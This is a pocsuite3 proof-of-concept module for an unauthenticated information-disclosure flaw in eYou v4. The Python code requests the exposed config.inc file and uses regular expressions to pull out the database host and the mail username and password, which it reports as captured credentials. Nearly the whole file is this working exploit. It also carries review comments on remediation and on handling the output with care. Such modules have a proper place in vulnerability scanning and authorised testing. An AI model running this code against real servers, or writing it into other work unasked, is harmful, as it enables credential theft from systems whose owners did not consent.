"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
import re

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
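class DemoPOC(POCBase):
    """Check whether an eYou v4 host serves /php/report/include/config.inc.

    The check requests the file and looks for PHP ``define()`` statements in
    the response body. Finding them means the configuration source, including
    the values captured in ``_verify``, is readable without authentication.
    Presumably the server returns the ``.inc`` file as text instead of
    executing it; the usual remedy is to deny web access to such files or
    keep them outside the document root (confirm against the deployment).
    """

    vulID = '1280'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-04-25'
    createDate = '2014-05-12'
    updateDate = '2014-05-12'
    references = ['http://wooyun.org/bugs/wooyun-2014-058462']
    name = 'eYou v4 /php/report/include/config.inc 信息泄露漏洞 POC'
    appPowerLink = 'http://www.eyou.com//'
    appName = 'eYou'
    appVersion = 'v4#'
    vulType = 'Information Disclosure'
    # Text kept flush-left so the string value stays exactly as published.
    desc = '''
eYou v4 /php/report/include/config.inc可绕过登陆验证进行用户管理等操作
'''
    samples = []
    install_requires = ['']

    @staticmethod
    def _define_value(name, content):
        """Return the double-quoted value of ``define('<name>', "...");``.

        Returns None when *content* holds no such statement. An empty
        string is a valid captured value and is returned as ''.
        """
        # Raw strings: the original non-raw literals relied on invalid
        # escape sequences (\( and \s), which newer Pythons warn about.
        pattern = r"define\(\s*'" + re.escape(name) + r"',\s*\"([^\"]*)\"\s*\);"
        match = re.search(pattern, content)
        return match.group(1) if match else None

    def _verify(self):
        """Fetch config.inc and report the disclosed settings, if any.

        The target counts as affected only when both MYSQL_HOST and
        MAIL_HOST definitions appear in the response body.
        """
        result = {}
        # Avoid a doubled slash when the target URL already ends with '/'.
        url = self.url.rstrip('/') + '/php/report/include/config.inc'
        content = requests.get(url).text

        mysql_host = self._define_value('MYSQL_HOST', content)
        mail_host = self._define_value('MAIL_HOST', content)
        if mysql_host is not None and mail_host is not None:
            # 'Database': {'Hostname': 'xxx', 'Username': 'xxx', 'Password': 'xxx', 'DBname': 'xxx'},
            # NOTE(review): Username/Password are read from MAIL_USER and
            # MAIL_PASS although they are reported under "Database"; kept as
            # in the original, confirm which constants were intended.
            # Missing definitions yield '' rather than an IndexError.
            # The captured values are credentials: whatever stores or prints
            # this result should be treated as sensitive.
            result["Database"] = {
                "Hostname": mysql_host,
                "Username": self._define_value('MAIL_USER', content) or '',
                "Password": self._define_value('MAIL_PASS', content) or '',
            }
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output: success if non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Run the same read-only check as ``_verify``."""
        return self._verify()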
# Register the class with pocsuite3 so the framework can load and run it.
register_poc(DemoPOC)